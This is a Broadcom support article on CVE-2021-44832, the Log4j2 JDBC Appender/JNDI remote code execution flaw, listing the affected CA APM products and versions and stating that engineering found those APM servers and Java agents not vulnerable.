CVE-2021-44832 - LOG4J VULNERABILITY AND BROADCOM CA APM
search cancel

CVE-2021-44832 - LOG4J VULNERABILITY AND BROADCOM CA APM

book

Article ID: 233619

calendar_today

Updated On:

Products

APM DX Application Performance Management DX APM SaaS DX SaaS CA Application Performance Management (APM / Wily / Introscope) CA Application Performance Management Agent (APM / Wily / Introscope)

Issue/Introduction

Products Affected:

  • APM
  • DX Application Performance Management
  • DX SaaS
  • CA Application Performance Management (APM / Wily / Introscope)
  • CA Application Performance Management Agent (APM / Wily / Introscope)
  • DX APM SaaS


Description:

CVE-2021-44832

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the Java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Environment

  • APM SaaS and APM on Premise 
  • APM 9.7, 10.0, 10.1, 10.2, 10.3, 10.5, 10.6, 10.7.x, 11.x and 20.x/21.x

Resolution

Resolution

  • Broadcom Engineering has confirmed that APM 9.7 thru APM 10.7.x servers(Collectors / MOMs / TESS / TIM / WebView), APM 11.x/SaaS/20.2/21.x Cloud Proxy and APM 9.7 thru APM 10.6/10.7/11.x/SaaS/20.2/21.x java based agents(i.e. Weblogic, Websphere, Tomcat, EPAgent, UMA, ...) are not vulnerable.
    Engineering analysis is continuing, and any additional information will be provided on the Broadcom support portal via KB articles and updates to this published notification. 

Should you have any further questions or concerns, please open a case with Broadcom Support.